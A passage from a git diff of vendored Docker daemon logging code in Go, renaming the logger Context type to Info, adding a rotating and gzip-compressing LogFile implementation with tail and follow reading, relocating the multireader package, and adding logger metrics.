MarshalFunc func(*Message) ([]byte, error) diff --git a/vendor/github.com/docker/docker/daemon/logger/logger_test.go b/vendor/github.com/docker/docker/daemon/logger/logger_test.go index 16e1514d2d..eaeec24085 100644 --- a/vendor/github.com/docker/docker/daemon/logger/logger_test.go +++ b/vendor/github.com/docker/docker/daemon/logger/logger_test.go @@ -1,26 +1,21 @@ -package logger +package logger // import "github.com/docker/docker/daemon/logger" import ( - "reflect" - "testing" - "time" + "github.com/docker/docker/api/types/backend" ) 
-func TestCopyMessage(t *testing.T) { +func (m *Message) copy() *Message { msg := &Message{ - Line: []byte("test line."), - Source: "stdout", - Timestamp: time.Now(), - Attrs: LogAttributes{ - "key1": "val1", - "key2": "val2", - "key3": "val3", - }, - Partial: true, + Source: m.Source, + PLogMetaData: m.PLogMetaData, + Timestamp: m.Timestamp, } - m := CopyMessage(msg) - if !reflect.DeepEqual(m, msg) { - t.Fatalf("CopyMessage failed to copy message") + if m.Attrs != nil { + msg.Attrs = make([]backend.LogAttr, len(m.Attrs)) + copy(msg.Attrs, m.Attrs) } + + msg.Line = append(make([]byte, 0, len(m.Line)), m.Line...) + return msg } diff --git a/vendor/github.com/docker/docker/daemon/logger/loggerutils/log_tag.go b/vendor/github.com/docker/docker/daemon/logger/loggerutils/log_tag.go index 4752679c72..719512dbdb 100644 --- a/vendor/github.com/docker/docker/daemon/logger/loggerutils/log_tag.go +++ b/vendor/github.com/docker/docker/daemon/logger/loggerutils/log_tag.go @@ -1,10 +1,10 @@ -package loggerutils +package loggerutils // import "github.com/docker/docker/daemon/logger/loggerutils" import ( "bytes" "github.com/docker/docker/daemon/logger" - "github.com/docker/docker/utils/templates" + "github.com/docker/docker/daemon/logger/templates" ) // DefaultTemplate defines the defaults template logger should use. @@ -12,8 +12,8 @@ const DefaultTemplate = "{{.ID}}" // ParseLogTag generates a context aware tag for consistency across different // log drivers based on the context of the running container. 
-func ParseLogTag(ctx logger.Context, defaultTemplate string) (string, error) { - tagTemplate := ctx.Config["tag"] +func ParseLogTag(info logger.Info, defaultTemplate string) (string, error) { + tagTemplate := info.Config["tag"] if tagTemplate == "" { tagTemplate = defaultTemplate } @@ -23,7 +23,7 @@ func ParseLogTag(ctx logger.Context, defaultTemplate string) (string, error) { return "", err } buf := new(bytes.Buffer) - if err := tmpl.Execute(buf, &ctx); err != nil { + if err := tmpl.Execute(buf, &info); err != nil { return "", err } diff --git a/vendor/github.com/docker/docker/daemon/logger/loggerutils/log_tag_test.go b/vendor/github.com/docker/docker/daemon/logger/loggerutils/log_tag_test.go index e2aa4358aa..41957a8b19 100644 --- a/vendor/github.com/docker/docker/daemon/logger/loggerutils/log_tag_test.go +++ b/vendor/github.com/docker/docker/daemon/logger/loggerutils/log_tag_test.go @@ -1,4 +1,4 @@ -package loggerutils +package loggerutils // import "github.com/docker/docker/daemon/logger/loggerutils" import ( "testing" @@ -7,27 +7,27 @@ import ( ) func TestParseLogTagDefaultTag(t *testing.T) { - ctx := buildContext(map[string]string{}) - tag, e := ParseLogTag(ctx, "{{.ID}}") - assertTag(t, e, tag, ctx.ID()) + info := buildContext(map[string]string{}) + tag, e := ParseLogTag(info, "{{.ID}}") + assertTag(t, e, tag, info.ID()) } func TestParseLogTag(t *testing.T) { - ctx := buildContext(map[string]string{"tag": "{{.ImageName}}/{{.Name}}/{{.ID}}"}) - tag, e := ParseLogTag(ctx, "{{.ID}}") + info := buildContext(map[string]string{"tag": "{{.ImageName}}/{{.Name}}/{{.ID}}"}) + tag, e := ParseLogTag(info, "{{.ID}}") assertTag(t, e, tag, "test-image/test-container/container-ab") } func TestParseLogTagEmptyTag(t *testing.T) { - ctx := buildContext(map[string]string{}) - tag, e := ParseLogTag(ctx, "{{.DaemonName}}/{{.ID}}") + info := buildContext(map[string]string{}) + tag, e := ParseLogTag(info, "{{.DaemonName}}/{{.ID}}") assertTag(t, e, tag, "test-dockerd/container-ab") 
} // Helpers -func buildContext(cfg map[string]string) logger.Context { - return logger.Context{ +func buildContext(cfg map[string]string) logger.Info { + return logger.Info{ ContainerID: "container-abcdefghijklmnopqrstuvwxyz01234567890", ContainerName: "/test-container", ContainerImageID: "image-abcdefghijklmnopqrstuvwxyz01234567890", diff --git a/vendor/github.com/docker/docker/daemon/logger/loggerutils/logfile.go b/vendor/github.com/docker/docker/daemon/logger/loggerutils/logfile.go new file mode 100644 index 0000000000..6e3cda8648 --- /dev/null +++ b/vendor/github.com/docker/docker/daemon/logger/loggerutils/logfile.go @@ -0,0 +1,666 @@ +package loggerutils // import "github.com/docker/docker/daemon/logger/loggerutils" + +import ( + "bytes" + "compress/gzip" + "context" + "encoding/json" + "fmt" + "io" + "os" + "strconv" + "strings" + "sync" + "time" + + "github.com/docker/docker/daemon/logger" + "github.com/docker/docker/daemon/logger/loggerutils/multireader" + "github.com/docker/docker/pkg/filenotify" + "github.com/docker/docker/pkg/pools" + "github.com/docker/docker/pkg/pubsub" + "github.com/docker/docker/pkg/tailfile" + "github.com/fsnotify/fsnotify" + "github.com/pkg/errors" + "github.com/sirupsen/logrus" +) + +const tmpLogfileSuffix = ".tmp" + +// rotateFileMetadata is a metadata of the gzip header of the compressed log file +type rotateFileMetadata struct { + LastTime time.Time `json:"lastTime,omitempty"` +} + +// refCounter is a counter of logfile being referenced +type refCounter struct { + mu sync.Mutex + counter map[string]int +} + +// Reference increase the reference counter for specified logfile +func (rc *refCounter) GetReference(fileName string, openRefFile func(fileName string, exists bool) (*os.File, error)) (*os.File, error) { + rc.mu.Lock() + defer rc.mu.Unlock() + + var ( + file *os.File + err error + ) + _, ok := rc.counter[fileName] + file, err = openRefFile(fileName, ok) + if err != nil { + return nil, err + } + + if ok { + 
rc.counter[fileName]++ + } else if file != nil { + rc.counter[file.Name()] = 1 + } + + return file, nil +} + +// Dereference reduce the reference counter for specified logfile +func (rc *refCounter) Dereference(fileName string) error { + rc.mu.Lock() + defer rc.mu.Unlock() + + rc.counter[fileName]-- + if rc.counter[fileName] <= 0 { + delete(rc.counter, fileName) + err := os.Remove(fileName) + if err != nil { + return err + } + } + return nil +} + +// LogFile is Logger implementation for default Docker logging. +type LogFile struct { + mu sync.RWMutex // protects the logfile access + f *os.File // store for closing + closed bool + rotateMu sync.Mutex // blocks the next rotation until the current rotation is completed + capacity int64 // maximum size of each file + currentSize int64 // current size of the latest file + maxFiles int // maximum number of files + compress bool // whether old versions of log files are compressed + lastTimestamp time.Time // timestamp of the last log + filesRefCounter refCounter // keep reference-counted of decompressed files + notifyRotate *pubsub.Publisher + marshal logger.MarshalFunc + createDecoder makeDecoderFunc + perms os.FileMode +} + +type makeDecoderFunc func(rdr io.Reader) func() (*logger.Message, error) + +// NewLogFile creates new LogFile +func NewLogFile(logPath string, capacity int64, maxFiles int, compress bool, marshaller logger.MarshalFunc, decodeFunc makeDecoderFunc, perms os.FileMode) (*LogFile, error) { + log, err := os.OpenFile(logPath, os.O_WRONLY|os.O_APPEND|os.O_CREATE, perms) + if err != nil { + return nil, err + } + + size, err := log.Seek(0, os.SEEK_END) + if err != nil { + return nil, err + } + + return &LogFile{ + f: log, + capacity: capacity, + currentSize: size, + maxFiles: maxFiles, + compress: compress, + filesRefCounter: refCounter{counter: make(map[string]int)}, + notifyRotate: pubsub.NewPublisher(0, 1), + marshal: marshaller, + createDecoder: decodeFunc, + perms: perms, + }, nil +} + +// WriteLogEntry 
writes the provided log message to the current log file. +// This may trigger a rotation event if the max file/capacity limits are hit. +func (w *LogFile) WriteLogEntry(msg *logger.Message) error { + b, err := w.marshal(msg) + if err != nil { + return errors.Wrap(err, "error marshalling log message") + } + + logger.PutMessage(msg) + + w.mu.Lock() + if w.closed { + w.mu.Unlock() + return errors.New("cannot write because the output file was closed") + } + + if err := w.checkCapacityAndRotate(); err != nil { + w.mu.Unlock() + return err + } + + n, err := w.f.Write(b) + if err == nil { + w.currentSize += int64(n) + w.lastTimestamp = msg.Timestamp + } + w.mu.Unlock() + return err +} + +func (w *LogFile) checkCapacityAndRotate() error { + if w.capacity == -1 { + return nil + } + + if w.currentSize >= w.capacity { + w.rotateMu.Lock() + fname := w.f.Name() + if err := w.f.Close(); err != nil { + w.rotateMu.Unlock() + return errors.Wrap(err, "error closing file") + } + if err := rotate(fname, w.maxFiles, w.compress); err != nil { + w.rotateMu.Unlock() + return err + } + file, err := os.OpenFile(fname, os.O_WRONLY|os.O_TRUNC|os.O_CREATE, w.perms) + if err != nil { + w.rotateMu.Unlock() + return err + } + w.f = file + w.currentSize = 0 + w.notifyRotate.Publish(struct{}{}) + + if w.maxFiles <= 1 || !w.compress { + w.rotateMu.Unlock() + return nil + } + + go func() { + compressFile(fname+".1", w.lastTimestamp) + w.rotateMu.Unlock() + }() + } + + return nil +} + +func rotate(name string, maxFiles int, compress bool) error { + if maxFiles < 2 { + return nil + } + + var extension string + if compress { + extension = ".gz" + } + + lastFile := fmt.Sprintf("%s.%d%s", name, maxFiles-1, extension) + err := os.Remove(lastFile) + if err != nil && !os.IsNotExist(err) { + return errors.Wrap(err, "error removing oldest log file") + } + + for i := maxFiles - 1; i > 1; i-- { + toPath := name + "." + strconv.Itoa(i) + extension + fromPath := name + "." 
+ strconv.Itoa(i-1) + extension + if err := os.Rename(fromPath, toPath); err != nil && !os.IsNotExist(err) { + return err + } + } + + if err := os.Rename(name, name+".1"); err != nil && !os.IsNotExist(err) { + return err + } + + return nil +} + +func compressFile(fileName string, lastTimestamp time.Time) { + file, err := os.Open(fileName) + if err != nil { + logrus.Errorf("Failed to open log file: %v", err) + return + } + defer func() { + file.Close() + err := os.Remove(fileName) + if err != nil { + logrus.Errorf("Failed to remove source log file: %v", err) + } + }() + + outFile, err := os.OpenFile(fileName+".gz", os.O_CREATE|os.O_TRUNC|os.O_RDWR, 0640) + if err != nil { + logrus.Errorf("Failed to open or create gzip log file: %v", err) + return + } + defer func() { + outFile.Close() + if err != nil { + os.Remove(fileName + ".gz") + } + }() + + compressWriter := gzip.NewWriter(outFile) + defer compressWriter.Close() + + // Add the last log entry timestramp to the gzip header + extra := rotateFileMetadata{} + extra.LastTime = lastTimestamp + compressWriter.Header.Extra, err = json.Marshal(&extra) + if err != nil { + // Here log the error only and don't return since this is just an optimization. + logrus.Warningf("Failed to marshal gzip header as JSON: %v", err) + } + + _, err = pools.Copy(compressWriter, file) + if err != nil { + logrus.WithError(err).WithField("module", "container.logs").WithField("file", fileName).Error("Error compressing log file") + return + } +} + +// MaxFiles return maximum number of files +func (w *LogFile) MaxFiles() int { + return w.maxFiles +} + +// Close closes underlying file and signals all readers to stop. 
+func (w *LogFile) Close() error { + w.mu.Lock() + defer w.mu.Unlock() + if w.closed { + return nil + } + if err := w.f.Close(); err != nil { + return err + } + w.closed = true + return nil +} + +// ReadLogs decodes entries from log files and sends them the passed in watcher +// +// Note: Using the follow option can become inconsistent in cases with very frequent rotations and max log files is 1. +// TODO: Consider a different implementation which can effectively follow logs under frequent rotations. +func (w *LogFile) ReadLogs(config logger.ReadConfig, watcher *logger.LogWatcher) { + w.mu.RLock() + currentFile, err := os.Open(w.f.Name()) + if err != nil { + w.mu.RUnlock() + watcher.Err <- err + return + } + defer currentFile.Close() + + currentChunk, err := newSectionReader(currentFile) + if err != nil { + w.mu.RUnlock() + watcher.Err <- err + return + } + + if config.Tail != 0 { + files, err := w.openRotatedFiles(config) + if err != nil { + w.mu.RUnlock() + watcher.Err <- err + return + } + w.mu.RUnlock() + seekers := make([]io.ReadSeeker, 0, len(files)+1) + for _, f := range files { + seekers = append(seekers, f) + } + if currentChunk.Size() > 0 { + seekers = append(seekers, currentChunk) + } + if len(seekers) > 0 { + tailFile(multireader.MultiReadSeeker(seekers...), watcher, w.createDecoder, config) + } + for _, f := range files { + f.Close() + fileName := f.Name() + if strings.HasSuffix(fileName, tmpLogfileSuffix) { + err := w.filesRefCounter.Dereference(fileName) + if err != nil { + logrus.Errorf("Failed to dereference the log file %q: %v", fileName, err) + } + } + } + + w.mu.RLock() + } + + if !config.Follow || w.closed { + w.mu.RUnlock() + return + } + w.mu.RUnlock() + + notifyRotate := w.notifyRotate.Subscribe() + defer w.notifyRotate.Evict(notifyRotate) + followLogs(currentFile, watcher, notifyRotate, w.createDecoder, config.Since, config.Until) +} + +func (w *LogFile) openRotatedFiles(config logger.ReadConfig) (files []*os.File, err error) { + 
w.rotateMu.Lock() + defer w.rotateMu.Unlock() + + defer func() { + if err == nil { + return + } + for _, f := range files { + f.Close() + if strings.HasSuffix(f.Name(), tmpLogfileSuffix) { + err := os.Remove(f.Name()) + if err != nil && !os.IsNotExist(err) { + logrus.Warningf("Failed to remove the logfile %q: %v", f.Name, err) + } + } + } + }() + + for i := w.maxFiles; i > 1; i-- { + f, err := os.Open(fmt.Sprintf("%s.%d", w.f.Name(), i-1)) + if err != nil { + if !os.IsNotExist(err) { + return nil, errors.Wrap(err, "error opening rotated log file") + } + + fileName := fmt.Sprintf("%s.%d.gz", w.f.Name(), i-1) + decompressedFileName := fileName + tmpLogfileSuffix + tmpFile, err := w.filesRefCounter.GetReference(decompressedFileName, func(refFileName string, exists bool) (*os.File, error) { + if exists { + return os.Open(refFileName) + } + return decompressfile(fileName, refFileName, config.Since) + }) + + if err != nil { + if !os.IsNotExist(errors.Cause(err)) { + return nil, errors.Wrap(err, "error getting reference to decompressed log file") + } + continue + } + if tmpFile == nil { + // The log before `config.Since` does not need to read + break + } + + files = append(files, tmpFile) + continue + } + files = append(files, f) + } + + return files, nil +} + +func decompressfile(fileName, destFileName string, since time.Time) (*os.File, error) { + cf, err := os.Open(fileName) + if err != nil { + return nil, errors.Wrap(err, "error opening file for decompression") + } + defer cf.Close() + + rc, err := gzip.NewReader(cf) + if err != nil { + return nil, errors.Wrap(err, "error making gzip reader for compressed log file") + } + defer rc.Close() + + // Extract the last log entry timestramp from the gzip header + extra := &rotateFileMetadata{} + err = json.Unmarshal(rc.Header.Extra, extra) + if err == nil && extra.LastTime.Before(since) { + return nil, nil + } + + rs, err := os.OpenFile(destFileName, os.O_CREATE|os.O_RDWR, 0640) + if err != nil { + return nil, 
errors.Wrap(err, "error creating file for copying decompressed log stream") + } + + _, err = pools.Copy(rs, rc) + if err != nil { + rs.Close() + rErr := os.Remove(rs.Name()) + if rErr != nil && !os.IsNotExist(rErr) { + logrus.Errorf("Failed to remove the logfile %q: %v", rs.Name(), rErr) + } + return nil, errors.Wrap(err, "error while copying decompressed log stream to file") + } + + return rs, nil +} + +func newSectionReader(f *os.File) (*io.SectionReader, error) { + // seek to the end to get the size + // we'll leave this at the end of the file since section reader does not advance the reader + size, err := f.Seek(0, os.SEEK_END) + if err != nil { + return nil, errors.Wrap(err, "error getting current file size") + } + return io.NewSectionReader(f, 0, size), nil +} + +type decodeFunc func() (*logger.Message, error) + +func tailFile(f io.ReadSeeker, watcher *logger.LogWatcher, createDecoder makeDecoderFunc, config logger.ReadConfig) { + var rdr io.Reader = f + if config.Tail > 0 { + ls, err := tailfile.TailFile(f, config.Tail) + if err != nil { + watcher.Err <- err + return + } + rdr = bytes.NewBuffer(bytes.Join(ls, []byte("\n"))) + } + + decodeLogLine := createDecoder(rdr) + for { + msg, err := decodeLogLine() + if err != nil { + if errors.Cause(err) != io.EOF { + watcher.Err <- err + } + return + } + if !config.Since.IsZero() && msg.Timestamp.Before(config.Since) { + continue + } + if !config.Until.IsZero() && msg.Timestamp.After(config.Until) { + return + } + select { + case <-watcher.WatchClose(): + return + case watcher.Msg <- msg: + } + } +} + +func followLogs(f *os.File, logWatcher *logger.LogWatcher, notifyRotate chan interface{}, createDecoder makeDecoderFunc, since, until time.Time) { + decodeLogLine := createDecoder(f) + + name := f.Name() + fileWatcher, err := watchFile(name) + if err != nil { + logWatcher.Err <- err + return + } + defer func() { + f.Close() + fileWatcher.Remove(name) + fileWatcher.Close() + }() + + ctx, cancel := 
context.WithCancel(context.Background()) + defer cancel() + go func() { + select { + case <-logWatcher.WatchClose(): + fileWatcher.Remove(name) + cancel() + case <-ctx.Done(): + return + } + }() + + var retries int + handleRotate := func() error { + f.Close() + fileWatcher.Remove(name) + + // retry when the file doesn't exist + for retries := 0; retries <= 5; retries++ { + f, err = os.Open(name) + if err == nil || !os.IsNotExist(err) { + break + } + } + if err != nil { + return err + } + if err := fileWatcher.Add(name); err != nil { + return err + } + decodeLogLine = createDecoder(f) + return nil + } + + errRetry := errors.New("retry") + errDone := errors.New("done") + waitRead := func() error { + select { + case e := <-fileWatcher.Events(): + switch e.Op { + case fsnotify.Write: + decodeLogLine = createDecoder(f) + return nil + case fsnotify.Rename, fsnotify.Remove: + select { + case <-notifyRotate: + case <-ctx.Done(): + return errDone + } + if err := handleRotate(); err != nil { + return err + } + return nil + } + return errRetry + case err := <-fileWatcher.Errors(): + logrus.Debug("logger got error watching file: %v", err) + // Something happened, let's try and stay alive and create a new watcher + if retries <= 5 { + fileWatcher.Close() + fileWatcher, err = watchFile(name) + if err != nil { + return err + } + retries++ + return errRetry + } + return err + case <-ctx.Done(): + return errDone + } + } + + handleDecodeErr := func(err error) error { + if errors.Cause(err) != io.EOF { + return err + } + + for { + err := waitRead() + if err == nil { + break + } + if err == errRetry { + continue + } + return err + } + return nil + } + + // main loop + for { + msg, err := decodeLogLine() + if err != nil { + if err := handleDecodeErr(err); err != nil { + if err == errDone { + return + } + // we got an unrecoverable error, so return + logWatcher.Err <- err + return + } + // ready to try again + continue + } + + retries = 0 // reset retries since we've succeeded + if 
!since.IsZero() && msg.Timestamp.Before(since) { + continue + } + if !until.IsZero() && msg.Timestamp.After(until) { + return + } + select { + case logWatcher.Msg <- msg: + case <-ctx.Done(): + logWatcher.Msg <- msg + for { + msg, err := decodeLogLine() + if err != nil { + return + } + if !since.IsZero() && msg.Timestamp.Before(since) { + continue + } + if !until.IsZero() && msg.Timestamp.After(until) { + return + } + logWatcher.Msg <- msg + } + } + } +} + +func watchFile(name string) (filenotify.FileWatcher, error) { + fileWatcher, err := filenotify.New() + if err != nil { + return nil, err + } + + logger := logrus.WithFields(logrus.Fields{ + "module": "logger", + "fille": name, + }) + + if err := fileWatcher.Add(name); err != nil { + logger.WithError(err).Warnf("falling back to file poller") + fileWatcher.Close() + fileWatcher = filenotify.NewPollingWatcher() + + if err := fileWatcher.Add(name); err != nil { + fileWatcher.Close() + logger.WithError(err).Debugf("error watching log file for modifications") + return nil, err + } + } + return fileWatcher, nil +} diff --git a/vendor/github.com/docker/docker/pkg/ioutils/multireader.go b/vendor/github.com/docker/docker/daemon/logger/loggerutils/multireader/multireader.go similarity index 92% rename from vendor/github.com/docker/docker/pkg/ioutils/multireader.go rename to vendor/github.com/docker/docker/daemon/logger/loggerutils/multireader/multireader.go index d7b97486c6..77980a2a0a 100644 --- a/vendor/github.com/docker/docker/pkg/ioutils/multireader.go +++ b/vendor/github.com/docker/docker/daemon/logger/loggerutils/multireader/multireader.go @@ -1,4 +1,4 @@ -package ioutils +package multireader // import "github.com/docker/docker/daemon/logger/loggerutils/multireader" import ( "bytes" @@ -46,7 +46,9 @@ func (r *multiReadSeeker) Seek(offset int64, whence int) (int64, error) { rdrOffset := offset - tmpOffset idx := i - rdr.Seek(rdrOffset, os.SEEK_SET) + if _, err := rdr.Seek(rdrOffset, os.SEEK_SET); err != nil { + return 
-1, err + } // make sure all following readers are at 0 for _, rdr := range r.readers[i+1:] { rdr.Seek(0, os.SEEK_SET) @@ -67,7 +69,9 @@ func (r *multiReadSeeker) Seek(offset int64, whence int) (int64, error) { } tmpOffset += s } - r.Seek(tmpOffset+offset, os.SEEK_SET) + if _, err := r.Seek(tmpOffset+offset, os.SEEK_SET); err != nil { + return -1, err + } return tmpOffset + offset, nil case os.SEEK_CUR: if r.pos == nil { @@ -134,25 +138,10 @@ func (r *multiReadSeeker) getCurOffset() (int64, error) { return totalSize, nil } -func (r *multiReadSeeker) getOffsetToReader(rdr io.ReadSeeker) (int64, error) { - var offset int64 - for _, r := range r.readers { - if r == rdr { - break - } - - size, err := getReadSeekerSize(rdr) - if err != nil { - return -1, err - } - offset += size - } - return offset, nil -} - func (r *multiReadSeeker) Read(b []byte) (int, error) { if r.pos == nil { - r.pos = &pos{0, 0} + // make sure all readers are at 0 + r.Seek(0, os.SEEK_SET) } bLen := int64(len(b)) diff --git a/vendor/github.com/docker/docker/pkg/ioutils/multireader_test.go b/vendor/github.com/docker/docker/daemon/logger/loggerutils/multireader/multireader_test.go similarity index 91% rename from vendor/github.com/docker/docker/pkg/ioutils/multireader_test.go rename to vendor/github.com/docker/docker/daemon/logger/loggerutils/multireader/multireader_test.go index 65309a9565..2fb66ab566 100644 --- a/vendor/github.com/docker/docker/pkg/ioutils/multireader_test.go +++ b/vendor/github.com/docker/docker/daemon/logger/loggerutils/multireader/multireader_test.go @@ -1,4 +1,4 @@ -package ioutils +package multireader // import "github.com/docker/docker/daemon/logger/loggerutils/multireader" import ( "bytes" @@ -55,6 +55,20 @@ func TestMultiReadSeekerReadAll(t *testing.T) { if string(b) != expected { t.Fatalf("ReadAll failed, got: %q, expected %q", string(b), expected) } + + // The positions of some readers are not 0 + s1.Seek(0, os.SEEK_SET) + s2.Seek(0, os.SEEK_END) + s3.Seek(0, os.SEEK_SET) 
+ mr = MultiReadSeeker(s1, s2, s3) + b, err = ioutil.ReadAll(mr) + if err != nil { + t.Fatal(err) + } + + if string(b) != expected { + t.Fatalf("ReadAll failed, got: %q, expected %q", string(b), expected) + } } func TestMultiReadSeekerReadEach(t *testing.T) { @@ -191,9 +205,9 @@ func TestMultiReadSeekerCurAfterSet(t *testing.T) { } func TestMultiReadSeekerSmallReads(t *testing.T) { - readers := []io.ReadSeeker{} + var readers []io.ReadSeeker for i := 0; i < 10; i++ { - integer := make([]byte, 4, 4) + integer := make([]byte, 4) binary.BigEndian.PutUint32(integer, uint32(i)) readers = append(readers, bytes.NewReader(integer)) } diff --git a/vendor/github.com/docker/docker/daemon/logger/loggerutils/rotatefilewriter.go b/vendor/github.com/docker/docker/daemon/logger/loggerutils/rotatefilewriter.go deleted file mode 100644 index 99e0964aea..0000000000 --- a/vendor/github.com/docker/docker/daemon/logger/loggerutils/rotatefilewriter.go +++ /dev/null @@ -1,124 +0,0 @@ -package loggerutils - -import ( - "os" - "strconv" - "sync" - - "github.com/docker/docker/pkg/pubsub" -) - -// RotateFileWriter is Logger implementation for default Docker logging. 
-type RotateFileWriter struct { - f *os.File // store for closing - mu sync.Mutex - capacity int64 //maximum size of each file - currentSize int64 // current size of the latest file - maxFiles int //maximum number of files - notifyRotate *pubsub.Publisher -} - -//NewRotateFileWriter creates new RotateFileWriter -func NewRotateFileWriter(logPath string, capacity int64, maxFiles int) (*RotateFileWriter, error) { - log, err := os.OpenFile(logPath, os.O_WRONLY|os.O_APPEND|os.O_CREATE, 0640) - if err != nil { - return nil, err - } - - size, err := log.Seek(0, os.SEEK_END) - if err != nil { - return nil, err - } - - return &RotateFileWriter{ - f: log, - capacity: capacity, - currentSize: size, - maxFiles: maxFiles, - notifyRotate: pubsub.NewPublisher(0, 1), - }, nil -} - -//WriteLog write log message to File -func (w *RotateFileWriter) Write(message []byte) (int, error) { - w.mu.Lock() - if err := w.checkCapacityAndRotate(); err != nil { - w.mu.Unlock() - return -1, err - } - - n, err := w.f.Write(message) - if err == nil { - w.currentSize += int64(n) - } - w.mu.Unlock() - return n, err -} - -func (w *RotateFileWriter) checkCapacityAndRotate() error { - if w.capacity == -1 { - return nil - } - - if w.currentSize >= w.capacity { - name := w.f.Name() - if err := w.f.Close(); err != nil { - return err - } - if err := rotate(name, w.maxFiles); err != nil { - return err - } - file, err := os.OpenFile(name, os.O_WRONLY|os.O_TRUNC|os.O_CREATE, 06400) - if err != nil { - return err - } - w.f = file - w.currentSize = 0 - w.notifyRotate.Publish(struct{}{}) - } - - return nil -} - -func rotate(name string, maxFiles int) error { - if maxFiles < 2 { - return nil - } - for i := maxFiles - 1; i > 1; i-- { - toPath := name + "." + strconv.Itoa(i) - fromPath := name + "." 
+ strconv.Itoa(i-1) - if err := os.Rename(fromPath, toPath); err != nil && !os.IsNotExist(err) { - return err - } - } - - if err := os.Rename(name, name+".1"); err != nil && !os.IsNotExist(err) { - return err - } - return nil -} - -// LogPath returns the location the given writer logs to. -func (w *RotateFileWriter) LogPath() string { - return w.f.Name() -} - -// MaxFiles return maximum number of files -func (w *RotateFileWriter) MaxFiles() int { - return w.maxFiles -} - -//NotifyRotate returns the new subscriber -func (w *RotateFileWriter) NotifyRotate() chan interface{} { - return w.notifyRotate.Subscribe() -} - -//NotifyRotateEvict removes the specified subscriber from receiving any more messages. -func (w *RotateFileWriter) NotifyRotateEvict(sub chan interface{}) { - w.notifyRotate.Evict(sub) -} - -// Close closes underlying file and signals all readers to stop. -func (w *RotateFileWriter) Close() error { - return w.f.Close() -} diff --git a/vendor/github.com/docker/docker/daemon/logger/context.go b/vendor/github.com/docker/docker/daemon/logger/loginfo.go similarity index 54% rename from vendor/github.com/docker/docker/daemon/logger/context.go rename to vendor/github.com/docker/docker/daemon/logger/loginfo.go index 085ab01a18..4c48235f5c 100644 --- a/vendor/github.com/docker/docker/daemon/logger/context.go +++ b/vendor/github.com/docker/docker/daemon/logger/loginfo.go @@ -1,14 +1,15 @@ -package logger +package logger // import "github.com/docker/docker/daemon/logger" import ( "fmt" "os" + "regexp" "strings" "time" ) -// Context provides enough information for a logging driver to do its function. -type Context struct { +// Info provides enough information for a logging driver to do its function. +type Info struct { Config map[string]string ContainerID string ContainerName string @@ -26,12 +27,12 @@ type Context struct { // ExtraAttributes returns the user-defined extra attributes (labels, // environment variables) in key-value format. 
This can be used by log drivers // that support metadata to add more context to a log. -func (ctx *Context) ExtraAttributes(keyMod func(string) string) map[string]string { +func (info *Info) ExtraAttributes(keyMod func(string) string) (map[string]string, error) { extra := make(map[string]string) - labels, ok := ctx.Config["labels"] + labels, ok := info.Config["labels"] if ok && len(labels) > 0 { for _, l := range strings.Split(labels, ",") { - if v, ok := ctx.ContainerLabels[l]; ok { + if v, ok := info.ContainerLabels[l]; ok { if keyMod != nil { l = keyMod(l) } @@ -40,14 +41,15 @@ func (ctx *Context) ExtraAttributes(keyMod func(string) string) map[string]strin } } - env, ok := ctx.Config["env"] - if ok && len(env) > 0 { - envMapping := make(map[string]string) - for _, e := range ctx.ContainerEnv { - if kv := strings.SplitN(e, "=", 2); len(kv) == 2 { - envMapping[kv[0]] = kv[1] - } + envMapping := make(map[string]string) + for _, e := range info.ContainerEnv { + if kv := strings.SplitN(e, "=", 2); len(kv) == 2 { + envMapping[kv[0]] = kv[1] } + } + + env, ok := info.Config["env"] + if ok && len(env) > 0 { for _, l := range strings.Split(env, ",") { if v, ok := envMapping[l]; ok { if keyMod != nil { @@ -58,11 +60,27 @@ func (ctx *Context) ExtraAttributes(keyMod func(string) string) map[string]strin } } - return extra + envRegex, ok := info.Config["env-regex"] + if ok && len(envRegex) > 0 { + re, err := regexp.Compile(envRegex) + if err != nil { + return nil, err + } + for k, v := range envMapping { + if re.MatchString(k) { + if keyMod != nil { + k = keyMod(k) + } + extra[k] = v + } + } + } + + return extra, nil } // Hostname returns the hostname from the underlying OS. 
-func (ctx *Context) Hostname() (string, error) { +func (info *Info) Hostname() (string, error) { hostname, err := os.Hostname() if err != nil { return "", fmt.Errorf("logger: can not resolve hostname: %v", err) @@ -73,39 +91,39 @@ func (ctx *Context) Hostname() (string, error) { // Command returns the command that the container being logged was // started with. The Entrypoint is prepended to the container // arguments. -func (ctx *Context) Command() string { - terms := []string{ctx.ContainerEntrypoint} - terms = append(terms, ctx.ContainerArgs...) +func (info *Info) Command() string { + terms := []string{info.ContainerEntrypoint} + terms = append(terms, info.ContainerArgs...) command := strings.Join(terms, " ") return command } // ID Returns the Container ID shortened to 12 characters. -func (ctx *Context) ID() string { - return ctx.ContainerID[:12] +func (info *Info) ID() string { + return info.ContainerID[:12] } // FullID is an alias of ContainerID. -func (ctx *Context) FullID() string { - return ctx.ContainerID +func (info *Info) FullID() string { + return info.ContainerID } // Name returns the ContainerName without a preceding '/'. -func (ctx *Context) Name() string { - return ctx.ContainerName[1:] +func (info *Info) Name() string { + return strings.TrimPrefix(info.ContainerName, "/") } // ImageID returns the ContainerImageID shortened to 12 characters. -func (ctx *Context) ImageID() string { - return ctx.ContainerImageID[:12] +func (info *Info) ImageID() string { + return info.ContainerImageID[:12] } // ImageFullID is an alias of ContainerImageID. 
-func (ctx *Context) ImageFullID() string { - return ctx.ContainerImageID +func (info *Info) ImageFullID() string { + return info.ContainerImageID } // ImageName is an alias of ContainerImageName -func (ctx *Context) ImageName() string { - return ctx.ContainerImageName +func (info *Info) ImageName() string { + return info.ContainerImageName } diff --git a/vendor/github.com/docker/docker/daemon/logger/metrics.go b/vendor/github.com/docker/docker/daemon/logger/metrics.go new file mode 100644 index 0000000000..b7dfd38ec2 --- /dev/null +++ b/vendor/github.com/docker/docker/daemon/logger/metrics.go @@ -0,0 +1,21 @@ +package logger // import "github.com/docker/docker/daemon/logger" + +import ( + "github.com/docker/go-metrics" +) + +var ( + logWritesFailedCount metrics.Counter + logReadsFailedCount metrics.Counter + totalPartialLogs metrics.Counter +) + +func init() { + loggerMetrics := metrics.NewNamespace("logger", "", nil) + + logWritesFailedCount = loggerMetrics.NewCounter("log_write_operations_failed", "Number of log write operations that failed") + logReadsFailedCount = loggerMetrics.NewCounter("log_read_operations_failed", "Number of log reads from container stdio that failed") + totalPartialLogs = loggerMetrics.NewCounter("log_entries_size_greater_than_buffer", "Number of log entries which are larger than the log buffer") + + metrics.Register(loggerMetrics) +} diff --git a/vendor/github.com/docker/docker/daemon/logger/plugin.go b/vendor/github.com/docker/docker/daemon/logger/plugin.go new file mode 100644 index 0000000000..c66540ce52 --- /dev/null +++ 